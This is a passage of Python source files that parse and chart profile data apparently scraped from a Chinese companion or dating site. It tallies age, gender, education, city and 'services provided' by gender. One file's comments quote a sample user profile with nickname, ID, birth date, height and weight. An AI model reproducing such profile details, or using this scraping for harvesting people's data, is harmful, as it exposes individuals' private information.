live_cities = []\n for r in jieba.cut(row[12], cut_all=True):\n live_cities.append(r)\n if len(live_cities) == 0:\n live_cities.append('其它')\n first = live_cities[0].strip()\n if first:\n if len(first) >= 2:\n live = live_cities[0].strip()\n if live == '马来':\n live = '马来西亚'\n else:\n live = '其他'\n else:\n live = '其他'\n origin = row[13].strip()\n services_tmp = row[18].strip().split(\";\")\n services = []\n for v in services_tmp:\n if v.strip():\n services.append(v.strip())\n ages.append(age)\n educations.append(education)\n origins.append(origin)\n service_types.extend(services)\n lives.append(live)\n if gender == \"男\":\n ages_men.append(age)\n educations_men.append(education)\n origins_men.append(origin)\n service_types_men.extend(services)\n lives_men.append(live)\n elif gender == \"女\":\n ages_women.append(age)\n educations_women.append(education)\n origins_women.append(origin)\n service_types_women.extend(services)\n lives_women.append(live)\n genders.append(gender)\n\n self._read_csv_file(callback)\n\n self.ages_dict = OrderedDict(sorted(Counter(ages).items()))\n self.ages_men_dict = OrderedDict(sorted(Counter(ages_men).items()))\n self.ages_women_dict = OrderedDict(sorted(Counter(ages_women).items()))\n self.genders_dict = OrderedDict(sorted(Counter(genders).items()))\n self.educations_dict = OrderedDict(sorted(Counter(educations).items()))\n self.educations_men_dict = OrderedDict(sorted(Counter(educations_men).items()))\n self.educations_women_dict = OrderedDict(sorted(Counter(educations_women).items()))\n self.service_types_dict = OrderedDict(sorted(Counter(service_types).items()))\n self.service_types_men_dict = OrderedDict(sorted(Counter(service_types_men).items()))\n self.service_types_women_dict = OrderedDict(sorted(Counter(service_types_women).items()))\n self.origin_dict = OrderedDict(sorted(Counter(origins).items()))\n self.origin_men_dict = OrderedDict(sorted(Counter(origins_men).items()))\n self.origin_women_dict = OrderedDict(sorted(Counter(origins_women).items()))\n self.lives_dict = 
OrderedDict(sorted(Counter(lives).items()))\n self.lives_men_dict = OrderedDict(sorted(Counter(lives_men).items()))\n self.lives_women_dict = OrderedDict(sorted(Counter(lives_women).items()))\n\n self.has_parse_file = True\n\n def _read_csv_file(self, parse_line_callback):\n with open(self.csv_file, mode=\"rt\", encoding=\"utf8\", buffering=8192) as f:\n reader = csv.reader(f)\n header = next(reader)\n for row in reader:\n parse_line_callback(row)\n\n def analyze(self):\n if not self.has_parse_file:\n self.parse_csv_file()\n self.print_tables()\n self.gen_images()\n self.save_to_xlsx()\n\n def print_tables(self):\n ages = [self.ages_dict, self.ages_men_dict, self.ages_women_dict]\n services = [self.service_types_dict, self.service_types_men_dict, self.service_types_women_dict]\n edus = [self.educations_dict, self.educations_men_dict, self.educations_women_dict]\n origins = [self.origin_dict, self.origin_men_dict, self.origin_women_dict]\n cities = [self.lives_dict, self.lives_men_dict, self.lives_women_dict]\n printer = TablePrinter(ages, services, edus, origins, cities)\n printer.print_tables()\n\n def save_to_xlsx(self):\n ages = [self.ages_dict, self.ages_men_dict, self.ages_women_dict]\n services = [self.service_types_dict, self.service_types_men_dict, self.service_types_women_dict]\n edus = [self.educations_dict, self.educations_men_dict, self.educations_women_dict]\n origins = [self.origin_dict, self.origin_men_dict, self.origin_women_dict]\n cities = [self.lives_dict, self.lives_men_dict, self.lives_women_dict]\n saver = XLSXSaver(filename=\"datas.xlsx\", ages=ages, services=services,\n educations=edus, origins=origins, cities=cities)\n saver.save_to_xlsx()\n\n def gen_images(self):\n ages = [self.ages_dict, self.ages_men_dict, self.ages_women_dict]\n services = [self.service_types_dict, self.service_types_men_dict, self.service_types_women_dict]\n edus = [self.educations_dict, self.educations_men_dict, self.educations_women_dict]\n origins = [self.origin_dict, self.origin_men_dict, self.origin_women_dict]\n cities = [self.lives_dict, self.lives_men_dict, self.lives_women_dict]\n generator = ImageGenerator(ages, services, edus, origins, cities)\n generator.gen_images()\n\n\nif __name__ == \"__main__\":\n v = Analyzer(\"/home/allen/PycharmProjects/datas/www89yn_data/0_info_20180609.csv\")\n v.analyze()\n" }, { "alpha_fraction": 0.5388017892837524, "alphanum_fraction": 0.5709690451622009, "avg_line_length": 37.261539459228516, "blob_id": "9e7d41873ecfe3104e587593efdb01fdf87fc311", "content_id": "b84fd1c499acc306a075cafc5b74b31e0c7c5090", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3037, "license_type": "permissive", "max_line_length": 72, "num_lines": 65, "path": "/bajiuwang/patterns.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import re\n\n\nclass Patterns:\n # <li>可去地区:<span>待议 </span></li>\n # <li>是否收费:<span>收费<FONT COLOR=#888888>..</FONT></span></li>\n # <li>服务时间:<span>待议 </span></li>\n # <li>使用语种:<span>普通话 </span></li>\n # <li>提供服务:<span>待议</span></li>\n # <li>兴趣爱好:<span>聊天, 赚钱 </span></li>\n # <li>性格类型:<span>阳光, 活泼可爱 </span></li>\n # <li>心情留言:<span>找工作 </span></li>\n\n PATTERN_AREA = re.compile(\"可去地区\")\n PATTERN_PAYMENT = re.compile(\"是否收费\")\n PATTERN_SERVE_TIME = re.compile(\"服务时间\")\n PATTERN_LANGUAGE = re.compile(\"使用语种\")\n PATTERN_SERVICE_TYPE_PROVIDED = re.compile(\"提供服务\")\n PATTERN_SERVICE_TYPE_NEEDED = re.compile(\"所需服务\")\n PATTERN_HOBBITS = re.compile(\"兴趣爱好\")\n 
PATTERN_CHARACTERISTIC = re.compile(\"性格类型\")\n PATTERN_MESSAGE = re.compile(\"心情留言\")\n\n # <li class=\"li539\"><span>昵  称:鑫大宝</span> </li>\n # <li class=\"li539\"><SPAN>I  D:</SPAN>700002&nbsp;&nbsp;\n # <!--诚意 登陆时间-->\n # 诚意:22<IMG alt=\"\" src=\"imageszny/images/cy2.gif\" align=\"absMiddle\">\n #\n # </li>\n # </li>\n # <li class=\"li265\"><SPAN>性  别:</SPAN>女</li>\n # <li class=\"li265\"><SPAN>年  龄:</SPAN>24岁</li>\n # <li class=\"li265\"><SPAN>出生年月:</SPAN>1987-8-19</li>\n # <li class=\"li265\"><SPAN>星  座:</SPAN>狮子</li>\n # <li class=\"li265\"><SPAN>身  高:</SPAN>162CM</li>\n # <li class=\"li265\"><SPAN>体  重:</SPAN>55KG</li>\n # <li class=\"li265\"><SPAN>体  形:</SPAN>匀称</li>\n # <li class=\"li265\"><SPAN>学  历:</SPAN>中专</li>\n # <li class=\"li265\"><SPAN>婚  姻:</SPAN>未婚</li>\n # <li class=\"li265\"><SPAN>职  业:</SPAN>医生</li>\n # <li class=\"li265\"><SPAN>居住城市:</SPAN>黑龙江&nbsp;哈尔滨\n # </li>\n # <li class=\"li265\"><SPAN>籍  贯:</SPAN>山东</li>\n # <li class=\"li265\"><SPAN>注册日期:</SPAN>VIP会员可见</li>\n # <li class=\"li265\"><SPAN>登陆日期:</SPAN>VIP会员可见</li>\n # </ul>\n\n PATTERN_NAME = re.compile(\"昵  称\")\n PATTERN_ID = re.compile(\"I  D\")\n PATTERN_GENDER = re.compile(\"性  别\")\n PATTERN_AGE = re.compile(\"年  龄\")\n PATTERN_BIRTH = re.compile(\"出生年月\")\n PATTERN_CONSTELLATION = re.compile(\"星  座\")\n PATTERN_HEIGHT = re.compile(\"身  高\")\n PATTERN_WEIGHT = re.compile(\"体  重\")\n PATTERN_SIZE = re.compile(\"体  形\")\n PATTERN_DEGREE = re.compile(\"学  历\")\n PATTERN_MARRIAGE = re.compile(\"婚  姻\")\n PATTERN_OCCUPATIONAL = re.compile(\"职  业\")\n PATTERN_LIVES = re.compile(\"居住城市\")\n PATTERN_ORIGIN = re.compile(\"籍  贯\")\n\n PATTERN_TYPE_1 = re.compile(\"[/<>SPANlispan;&b\\\"]\")\n PATTERN_TYPE_ID = re.compile(\"[</>a-zA-Z&;]\")\n PATTERN_TYPE_PAYMENT = re.compile(\"[</>a-zA-Z0-9=.#]\")\n" }, { "alpha_fraction": 0.6250850558280945, "alphanum_fraction": 0.6307552456855774, "avg_line_length": 38.36606979370117, "blob_id": "adc0e82d8c8753e803f179acfb09c78f8adebe9a", "content_id": "f214a0dc1362985bd7a1e292f1fe23ce8219aecd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4409, "license_type": "permissive", "max_line_length": 112, "num_lines": 112, "path": "/bajiuwang/csv_image_generator.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import os\n\nimport matplotlib.pyplot as plt\n\n\nclass ImageGenerator:\n\n def __init__(self, ages, services, educations, origins, cities):\n self.ages_all_dict = ages[0]\n self.ages_men_dict = ages[1]\n self.ages_women_dict = ages[2]\n self.services_all_dict = services[0]\n self.services_men_dict = services[1]\n self.services_women_dict = services[2]\n self.edus_all_dict = educations[0]\n self.edus_men_dict = educations[1]\n self.edus_women_dict = educations[2]\n self.origins_all_dict = origins[0]\n self.origins_men_dict = origins[1]\n self.origins_women_dict = origins[2]\n self.cities_all_dict = cities[0]\n self.cities_men_dict = cities[1]\n self.cities_women_dict = cities[2]\n\n @staticmethod\n def _total_value(values):\n total = 0\n for v in values:\n total += int(v)\n return total\n\n def plot_age_line(self):\n plt.figure(figsize=(10, 7))\n plt.title('Age distribution line chart')\n plt.plot(self.ages_all_dict.keys(), self.ages_all_dict.values())\n plt.xlabel('Age')\n plt.savefig(\"images/age_line.png\")\n\n def plot_age_pie(self):\n self._plot_pie(\"Age distribution pie chart\", self.ages_all_dict, \"age_pie.png\")\n\n def plot_age_men_pie(self):\n self._plot_pie(\"Male age 
distribution pie chart\", self.ages_men_dict, \"age_men_pie.png\")\n\n def plot_age_women_pie(self):\n self._plot_pie(\"Female age distribution pie chart\", self.ages_women_dict, \"age_women_pie.png\")\n\n def _plot_pie(self, title, collection, filename, rotatelabels=False):\n total = self._total_value(collection.values())\n plt.figure(figsize=(7, 7))\n plt.title(title)\n labels = []\n for k, v in collection.items():\n v = \"%s - %.2f\" % (k, int(v) / total * 100)\n labels.append(v + \"%\")\n plt.pie(collection.values(), labels=labels, rotatelabels=rotatelabels)\n plt.savefig(os.path.join(os.path.dirname(__file__), \"images\", filename))\n\n def plot_service_types_pie(self):\n self._plot_pie(\"Service types distribution pie chart\", self.services_all_dict, \"service_types_pie.png\")\n\n def plot_service_types_men_pie(self):\n self._plot_pie(\"Male service types distribution pie chart\", self.services_men_dict,\n \"service_types_men_pie.png\")\n\n def plot_service_types_women_pie(self):\n self._plot_pie(\"Female service types distribution pie chart\", self.services_women_dict,\n \"service_types_women_pie.png\")\n\n def plot_edus_pie(self):\n self._plot_pie(\"Educations distribution pie chart\", self.edus_all_dict, \"educations_pie.png\")\n\n def plot_edus_men_pie(self):\n self._plot_pie(\"Male educations distribution pie chart\", self.edus_men_dict, \"educations_men_pie.png\")\n\n def plot_edus_women_pie(self):\n self._plot_pie(\"Female educations distribution pie chart\", self.edus_women_dict, \"educations_women.png\")\n\n def plot_origins_pie(self):\n self._plot_pie(\"Origins distribution pie chart\", self.origins_all_dict, \"origins_pie.png\")\n\n def plot_origins_men_pie(self):\n self._plot_pie(\"Male origins distribution pie chart\", self.origins_men_dict, \"origins_men_pie.png\")\n\n def plot_origins_women_pie(self):\n self._plot_pie(\"Female origins distribution pie chart\", self.origins_women_dict, \"origins_women.png\")\n\n def plot_cities_pie(self):\n self._plot_pie(\"Cities distribution pie chart\", self.cities_all_dict, \"cities_pie.png\")\n\n def plot_cities_men_pie(self):\n self._plot_pie(\"Male cities distribution pie chart\", self.cities_men_dict, \"cities_men_pie.png\")\n\n def plot_cities_women_pie(self):\n self._plot_pie(\"Female cities distribution pie chart\", self.cities_women_dict, \"cities_women_pie.png\")\n\n def gen_images(self):\n self.plot_age_pie()\n self.plot_age_men_pie()\n self.plot_age_women_pie()\n self.plot_service_types_pie()\n self.plot_service_types_men_pie()\n self.plot_service_types_women_pie()\n self.plot_edus_pie()\n self.plot_edus_men_pie()\n self.plot_edus_women_pie()\n self.plot_origins_pie()\n self.plot_origins_men_pie()\n self.plot_origins_women_pie()\n self.plot_cities_pie()\n self.plot_cities_men_pie()\n self.plot_cities_women_pie()\n" } ]
14
instillai/video-rotation-gpu
https://github.com/instillai/video-rotation-gpu
1ff08076992483c5e66c9e07491b6899b777366e
5367560b0cebaa9843c0528a5cc70afbf2841cdc
abfaee80a5e82da595a04dbf2cbd1472941aa08d
refs/heads/master
2021-10-19T01:28:17.821959
2019-02-16T20:50:59
2019-02-16T20:50:59
170,967,439
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6643936634063721, "alphanum_fraction": 0.6692070960998535, "avg_line_length": 42.21965408325195, "blob_id": "40bc770979e921137bd5a0f446472483175f340e", "content_id": "e2bba0514a68203455634dd5e619dda3352933fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7479, "license_type": "no_license", "max_line_length": 188, "num_lines": 173, "path": "/README.md", "repo_name": "instillai/video-rotation-gpu", "src_encoding": "UTF-8", "text": "\n# Rotation of Video using FFMPEG With NVIDIA GPU Acceleration on Ubuntu\n---------------------------------------------------------------------\n\nThis tutorial deals with video rotation using GPU accelerated libraries\nsupported by FFMPEG in Ubuntu 16.04. The code here belongs to [\"GPU Based Video Rotation Using Python on Ubuntu\"](https://machinelearningmindset.com/gpu-based-video-rotation-ffmpeg/) post.\n<!-- ####################### ####################### ####################### ####################### -->\n<!-- ####################### ####################### ####################### ####################### -->\n<!-- ####################### ####################### ####################### ####################### -->\n<!-- ####################### ####################### ####################### ####################### -->\n## Introduction\n------------\n\n**FFmpeg** is one of the most famous multimedia frameworks wich is\nwidely used for processeing videos. In order to encode the video,\ncertainly a video encoder must be used. The popular\n`x264` is the one which is widely used however it is not\nsuper fast! The lastest `NVIDIA GPUs` contain a\nhardware-based video encoder called `NVENC` which is much\nfaster than traditional ones. In order to be able to utilize this\ngpu-accelerated encoder, FFmpeg must be installed with NVENC support.\nThe full documentation of FFmpeg integrated with NVIDIA can be fount at\n[here](https://developer.nvidia.com/ffmpeg). documentation on NVENC can\nbe found\n[here](https://developer.nvidia.com/nvidia-video-codec-sdk#NVENCFeatures).\nMoreover The NVENC programming guide can be found\n[here](https://developer.nvidia.com/nvidia-video-codec-sdk#NVENCFeatures).\n\nIn this tutorial the main goal is to show how to do video rotation with\nGPU-accelerated libraries in Linux. In this tutorial we do not use the\nterminal commands directly for employing the FFmpeg with NVENC support.\nInstead the python interface is being used to run commands in the\nterminal. This can be done using `subprocess` python\nmodule. This module is employed for execution and dealing external\ncommands, intended to supercede the `os.sys` module. The\ntrivial method os its usage will be explained in this tutorial. Please\nrefer to [this\ndocumentation](https://docs.python.org/2/library/subprocess.html) for\nfurther details.\n\nThe assumption of this tutorial is that the FFmpeg is already installed\nwith NVENC support. The installation guide can be found in [FFMPEG WITH\nNVIDIA ACCELERATION ON UBUNTU\nLINUX](http://developer.download.nvidia.com/compute/redist/ffmpeg/1511-patch/FFMPEG-with-NVIDIA-Acceleration-on-Ubuntu_UG_v01.pdf)\ndocumentation provided by NVIDIA.\n\n## Data Indicator\n--------------\n\nThis tutorial is customized for processing multiple videos. The\nassumption is that the full path of each video is stored in a\n`.txt` file in line-by-line format. 
The example of the\n\".txt\" file is as below:\n<p align=\"center\">\n <img src=\"_images/txtfileformat.png\"><br>\n <b>Figure 1: The format of .txt file.</b><br>\n</p>\n\nAs a guidance, if a recursive search for specific files in a directory\nand its subdirectories with extension `\".png\"` is\ndesired, the following command line method is useful; it saves the\noutput as a \".txt\" file:\n```shell\nfind /absolute/path/to/directory/to/be/search -type f -name\n \"*.png\" > /absolute/path/to/save/the/output/textfile.txt\n```\n\n## Video Rotation\n--------------\n\nFrom now on the assumption is that the \".txt\" file is ready and\nwell-formatted. The Python script for processing videos is as below:\n```python\n import subprocess\n import os\n\n # Pre...\n textfile_path = 'videos.txt'\n output_prefix = 'front'\n\n # Read the text file line by line.\n with open(textfile_path) as f:\n content = f.readlines()\n\n # Remove whitespace characters like `\\n` at the end of each line\n files_list = [x.strip() for x in content]\n\n # Transpose 90 degree & Clockwise\n # It already saves the video file using the name defined by output_prefix.\n for file_num, file_path in enumerate(files_list, start=1):\n\n # Get the file name with extension\n file_name = os.path.basename(file_path)\n\n # Get the file name without extension\n raw_file_name = os.path.basename(file_name).split('.')[0]\n\n # Get the input file directory path.\n file_dir = os.path.dirname(file_path)\n\n # Form the output file full path.\n output_file_path = file_dir + '/' + output_prefix + '_' + raw_file_name + '.mov'\n\n print('processing file: %s' % file_path)\n subprocess.call(\n ['ffmpeg', '-i', file_path, '-vf', 'transpose=1', '-vcodec', 'nvenc',\n '-preset', 'slow', '-b:v', '5M',\n '-acodec', 'copy', output_file_path])\n print('file %s saved' % output_file_path)\n```\n\n### I - Overall Code Description\n\nThe `videos.txt` file is saved in the absolute path.\n**Lines 8-13** of the code read the \".txt\" file and store each line as\nan item of a list called `files_list`. The loop starting\nat **line 17** processes each file with the\n`subprocess.call` command. In each loop the folder of the\ninput file is found and the output file will be stored in the same\ndirectory but with a different naming convention, which is explained by the\ncomments in the code. Each `,` in the `subprocess.call` command in Python corresponds\nto `an empty space` in the terminal. As an example, the\ncorresponding shell command is as below:\n```shell\nffmpeg -i file_path -filter:v transpose=1 -vcodec nvenc -preset\n slow -b:v 5M -acodec copy output_file_path\n```\n\n### II - FFmpeg Encoder\n\nThe command executed by **FFmpeg** needs to be described. Each of the\nelements starting with `-` calls a specific operation,\nand the value that follows it configures that operation. For\nexample, the `-vcodec` indicator specifies the **codec** to\nbe used by **FFmpeg**, and **nvenc**, which follows it, points to the\ncodec. More details can be found at [FFmpeg Filters\nDocumentation](http://ffmpeg.org/ffmpeg-filters.html). 
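As a quick sanity check (an added aside, not from the original post), one can first confirm that the local FFmpeg build actually ships the NVENC encoder:\n```shell\n# List the available encoders and keep only the NVENC entries.\nffmpeg -encoders | grep -i nvenc\n```\n\n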
The following\ntable summarizes the indicators:\n\n| Attribute | Description | Option | Option description |\n| :-------------: | :-------------: | :-----: | :-----: |\n| -i | input argument | file_path | path to the input file |\n| -vf | alias for -filter:v | transpose=1 | clockwise rotation by 90 |\n| -vcodec | Set the video codec | nvenc | NVIDIA GPU accelerated library |\n| -preset | increase the quality | slow | improves quality |\n| -b:v | set the video bitrate | 5M | Set to 5M |\n| -acodec | set the audio codec | copy | only copied and no encoding |\n\n\nThe `-vf` option is the main command here; its full\ndocumentation, covering the **filter options**, is available\n[here](https://ffmpeg.org/ffmpeg.html#filter_005foption).\n## Code Execution\n--------------\n\nIn order to run the Python file, we go to the terminal and execute the\nfollowing:\n```shell\npython /absolute/path/to/python/file\n\n```\n\nAs a consideration, if we are working in a specific virtual\nenvironment, it has to be activated first.\n## Summary\n-------\n\nThis tutorial demonstrated how to process a video, specifically\nrotating it, using **FFmpeg** and the NVIDIA GPU accelerated encoder called\n**NVENC**. The advantage of using the Python interface is that it easily parses\nthe **.txt** file and loops through all files. Moreover, it gives the\nuser options that would be more complex to employ directly in the\nterminal environment.\n\n" }, { "alpha_fraction": 0.6776947975158691, "alphanum_fraction": 0.6846318244934082, "avg_line_length": 35.74509811401367, "blob_id": "17eeb445a87192c26532c200058a0d3ab4f4b5b8", "content_id": "34504be99d8b84bb83a053e8fb754764a86d5dcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1874, "license_type": "no_license", "max_line_length": 110, "num_lines": 51, "path": "/python/RotateVideo.py", "repo_name": "instillai/video-rotation-gpu", "src_encoding": "UTF-8", "text": "\"\"\"\nThe subprocess module provides an interface for working with additional processes. It offers a higher-level\ninterface than some of the other available modules. 
It is intended to replace functions such as os.system().\nIn this code it is used to rotate a video file with the support of \"ffmpeg\" on Ubuntu.\n\nThe reason behind using Python rather than the command line is its higher flexibility for digging into file paths and\ndoing further processing on the fly.\n\nThis Python module:\n\n 1 - Reads a text file which lists the video file paths.\n 2 - Makes a list of those paths.\n 3 - Reads the listed files one by one.\n 4 - Rotates each video 90 degrees clockwise.\n 5 - Saves the file in the same folder with the prefix \"front\".\n\"\"\"\nimport subprocess\nimport os\n\n# Pre...\ntextfile_path = 'videos.txt'\noutput_prefix = 'front'\n\n# Read the text file line by line.\nwith open(textfile_path) as f:\n content = f.readlines()\n\n# Remove whitespace characters like `\\n` at the end of each line\nfiles_list = [x.strip() for x in content]\n\n# Transpose 90 degree & Clockwise\n# It already saves the video file using the name defined by output_prefix.\nfor file_num, file_path in enumerate(files_list, start=1):\n\n # Get the file name with extension\n file_name = os.path.basename(file_path)\n\n # Get the file name without extension\n raw_file_name = os.path.basename(file_name).split('.')[0]\n\n # Get the input file directory path.\n file_dir = os.path.dirname(file_path)\n\n # Form the output file full path.\n output_file_path = file_dir + '/' + output_prefix + '_' + raw_file_name + '.mov'\n\n print('processing file: %s' % file_path)\n subprocess.call(\n ['ffmpeg', '-i', file_path, '-vf', 'transpose=1', '-vcodec', 'nvenc', '-preset', 'slow', '-b:v', '5M',\n '-acodec', 'copy', output_file_path])\n print('file %s saved' % output_file_path)\n" } ]
2
vrushabh-shah/DS
https://github.com/vrushabh-shah/DS
f452e91ebd381486acf6f7009ebd668ba6455d6b
8ddc086fcb605bb872504e71100e65323804adad
6f2ad6a4f040987e58a970a6c79d4404c1fef0bc
refs/heads/master
2022-12-17T05:48:54.239301
2020-09-29T20:42:59
2020-09-29T20:42:59
279,406,985
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48288974165916443, "alphanum_fraction": 0.4904943108558655, "avg_line_length": 16, "blob_id": "6ae4562655fdbb9366120df443223af9bc1e6f3f", "content_id": "89010985d16355f85bef777494cd703b1307fcb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 526, "license_type": "no_license", "max_line_length": 47, "num_lines": 31, "path": "/demo.py", "repo_name": "vrushabh-shah/DS", "src_encoding": "UTF-8", "text": "'''\ninput : list[str]\noutput :list[list[]]\n each list : 3 to 5\n'''\n\n# input = [a,b,c,d,e]\n# example output : a,b,c ,.. so on\n\ndef groups(list):\n #basic\n if not list:\n return [[]]\n\n n = len(list)\n start = 0\n end = n\n window_size = 3\n ans = []\n while start < end:\n int_ans = list[start:start+window_size]\n ans.append(int_ans)\n if start + window_size < n:\n start += window_size\n else:\n break\n\n return ans\n\n\nprint (groups(['a','b','c','d','e']))" } ]
1
UANDES-ICC6120-201810/control-compiler
https://github.com/UANDES-ICC6120-201810/control-compiler
7ca81630a9a6808cfd0c5b17998c848aa247f446
96e51d476d52eafc4e674c560b89d81031e6dbe1
43f8dfafd233497daf34e5d1224db51476fa1c0f
refs/heads/master
2020-03-21T17:02:36.008859
2018-07-05T17:17:05
2018-07-05T17:17:05
138,809,570
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6186813116073608, "alphanum_fraction": 0.6238095164299011, "avg_line_length": 26.57575798034668, "blob_id": "cc0a5615042f102f51938410171ccc261c6786a0", "content_id": "8babf55ef2d4094802475bc2711f21cb7df05495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2730, "license_type": "no_license", "max_line_length": 112, "num_lines": 99, "path": "/compiler-script.py", "repo_name": "UANDES-ICC6120-201810/control-compiler", "src_encoding": "UTF-8", "text": "import mysql.connector\nimport requests\nfrom time import sleep\n\nAPI_HOST = 'http://proyectozapo.herokuapp.com/api/v1'\nAPI_COMPILER_ENDPOINT = '{0}/vehicle_event'.format(API_HOST)\nCLIENT_SECRET = 'Bearer eyJhbGciOiJIUzI1NiJ9.eyJidXNfc3RvcF9jb2RlIjoiUEM2MjEifQ.kAbz6orY0Er1sZmKrPfMjzYm36cW3wiO_sYyNK43rKk'\n\nCONN_PARAMS = {\n 'user': 'ALPR',\n 'password': 'PASSALPR',\n 'host': 'docker-db',\n 'database': 'control_point'\n}\n\ndef connect_to_db(conn_params):\n while True:\n try:\n print \"[Info] Connecting to db\"\n connection = mysql.connector.connect(buffered=True, **conn_params)\n print \"[Info] Connection successful!\"\n return connection\n except mysql.connector.errors.InterfaceError:\n print \"[Error] Couldn't connect to database. Retrying...\"\n sleep(1)\n\ndef fetch_plates(connection):\n select_cursor = connection.cursor()\n query = 'SELECT id, plate, submitted FROM plate_readings'\n select_cursor.execute(query)\n results = select_cursor.fetchall()\n\n select_cursor.close()\n\n return results\n\ndef generate_post_body(result_row):\n row_id, plate, submitted = result_row\n\n body = {\n 'plate_number': plate,\n 'speed': 0,\n 'event_time': submitted\n }\n\n return body\n\ndef post_plate(body, on_success, *args):\n response = post_with_retry(data=body)\n plate = body['plate_number']\n\n if response.status_code == 201:\n print_post_info('succeeded', response.status_code, plate)\n\n on_success(*args)\n else:\n print_post_info('failed', response.status_code, plate)\n\ndef post_with_retry(data):\n while True:\n try:\n response = requests.post(API_COMPILER_ENDPOINT, data=data, headers={'Authorization': CLIENT_SECRET})\n return response\n except requests.exceptions.ConnectionError:\n print \"[Error] Post failed. Retrying...\"\n\ndef print_post_info(status, code, plate):\n print \"[Info] Post {0}!\".format(status)\n print \"[Info] Code: {0}\".format(code)\n print \"[Info] Plate: {0}\".format(plate)\n\ndef delete_plate_from_db(connection, plate_id):\n delete_cursor = connection.cursor()\n delete_query = 'DELETE FROM plate_readings WHERE id=' + str(plate_id)\n delete_cursor.execute(delete_query)\n connection.commit()\n delete_cursor.close()\n\ndef main():\n while True:\n sleep(10)\n connection = connect_to_db(CONN_PARAMS)\n\n results = fetch_plates(connection)\n\n if len(results) == 0:\n print \"[Info] No plates in database\"\n continue\n\n for result_row in results:\n row_id = result_row[0]\n\n body = generate_post_body(result_row)\n post_plate(body, delete_plate_from_db, connection, row_id)\n\n connection.close()\n\nif __name__ == '__main__':\n main()\n" } ]
1
doflamingo0/Planning_Optimization
https://github.com/doflamingo0/Planning_Optimization
a58a3765eca69df5cf4b355d9f1c52e21f745239
b21ee5bae47da62360ea5fd73bc311ea281d8f6e
051ca53375f60d3fc7d23552bdba7cc6b311b5e3
refs/heads/master
2023-05-11T21:03:59.483655
2021-06-02T02:45:18
2021-06-02T02:45:18
357,422,292
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5167986750602722, "alphanum_fraction": 0.5427478551864624, "avg_line_length": 24.78169059753418, "blob_id": "1a5b9788cad50e6847b3f3cc46282156bebbd105", "content_id": "69aae275f8c6bf59401af2d7eb2e8088f817dee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3661, "license_type": "no_license", "max_line_length": 93, "num_lines": 142, "path": "/Project-optimal-CP-v3.py", "repo_name": "doflamingo0/Planning_Optimization", "src_encoding": "UTF-8", "text": "import time\nfrom ortools.sat.python import cp_model\nimport numpy as np\n#input\ndef input(fileName):\n with open(fileName, 'r') as f:\n [N, M] = [int(x) for x in f.readline().split()]\n \n # them cot 0 vao cot Q[i][0]\n Q = []\n for i in range(N):\n tmp =[int(x) for x in f.readline().split()]\n tmp.append(int(0))\n tmp = tmp[-1:] + tmp[:-1]\n Q.append(tmp)\n\n d = []\n for i in range(M+1):\n d.append([int(x) for x in f.readline().split()])\n \n q = [int(x) for x in f.readline().split()]\n \n return N, M, Q, d, q\n\nt1 = time.time()\nN,M,Q,d,q = input('test_30_14.txt')\n# xu ly du lieu\n# maxd la tong tat ca cac canh cua do thi duong di\nmaxd = 0\nfor i in range(M+1):\n for j in range(i+1,M+1):\n maxd = maxd + d[i][j]\n# total[i] la tong so luong cua moi mat hang i\ntotal = [0 for i in range(N)]\nfor i in range(N):\n for j in range(M+1):\n total[i] = total[i] + Q[i][j]\n\n#model\n# variable\nmodel = cp_model.CpModel()\n\nx = {}\nfor i in range(M+2):\n for j in range(M+2):\n if i != j:\n x[i, j] = model.NewIntVar(0, 1, 'x['+str(i) +', '+str(j)+']')\n\n# neu ke i duoc i duoc den thi y[i] =1 va nguoc lai\ny = [model.NewIntVar(0,1,'y['+str(i)+']') for i in range(0,M+2)]\n# tong quang duong tu 0 den diem i\nz = [model.NewIntVar(0,maxd,'z['+str(i)+']') for i in range(0,M+2)]\n\n#constraint\n#khoi tao gia bien\nmodel.Add(y[0]==1)\nmodel.Add(y[M+1]==1)\nmodel.Add(z[0]==0)\nmodel.Add(sum(x[0,i] for i in range(1,M+1))==1)\nmodel.Add(sum(x[i,M+1] for i in range(1,M+1))==1)\n\n#constraint 2\n\nfor i in range(M+1):\n for j in range(1,M+2):\n \tif i !=j:\n\t # x[i] = j => y[i] +y[j] =2\n\t b= model.NewBoolVar('b')\n\t model.Add(x[i,j]==1).OnlyEnforceIf(b)\n\t model.Add(x[i,j]!=1).OnlyEnforceIf(b.Not())\n\t model.Add(y[i]+y[j]==2).OnlyEnforceIf(b)\n#constraint 3\nfor i in range(1,M+1):\n\tb= model.NewBoolVar('b')\n\tmodel.Add(y[i]==1).OnlyEnforceIf(b)\n\tmodel.Add(y[i]!=1).OnlyEnforceIf(b.Not())\n\tmodel.Add(sum(x[i,j] for j in range(1,M+2) if i!=j)==1).OnlyEnforceIf(b)\n\n\t\t\t\n\n\n#constraint 4\nfor i in range(1,M+1):\n\tb= model.NewBoolVar('b')\n\tmodel.Add(y[i]==1).OnlyEnforceIf(b)\n\tmodel.Add(y[i]!=1).OnlyEnforceIf(b.Not())\n\tmodel.Add(sum(x[j,i] for j in range(M+1) if i!=j)==1).OnlyEnforceIf(b)\n\n\n#constraint 5\nfor i in range(M+1):\n for j in range(1,M+2):\n \tif i!=j:\n\t b= model.NewBoolVar('b')\n\t model.Add(x[i,j]==1).OnlyEnforceIf(b)\n\t model.Add(x[i,j]!=1).OnlyEnforceIf(b.Not())\n\t model.Add(z[i]+d[i%(M+1)][j%(M+1)]==z[j]).OnlyEnforceIf(b)\n\n#constraint 5\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) >= q[i])\nfor i in range(N):\n model.Add(sum(Q[i][j]*y[j] for j in range(M+1)) 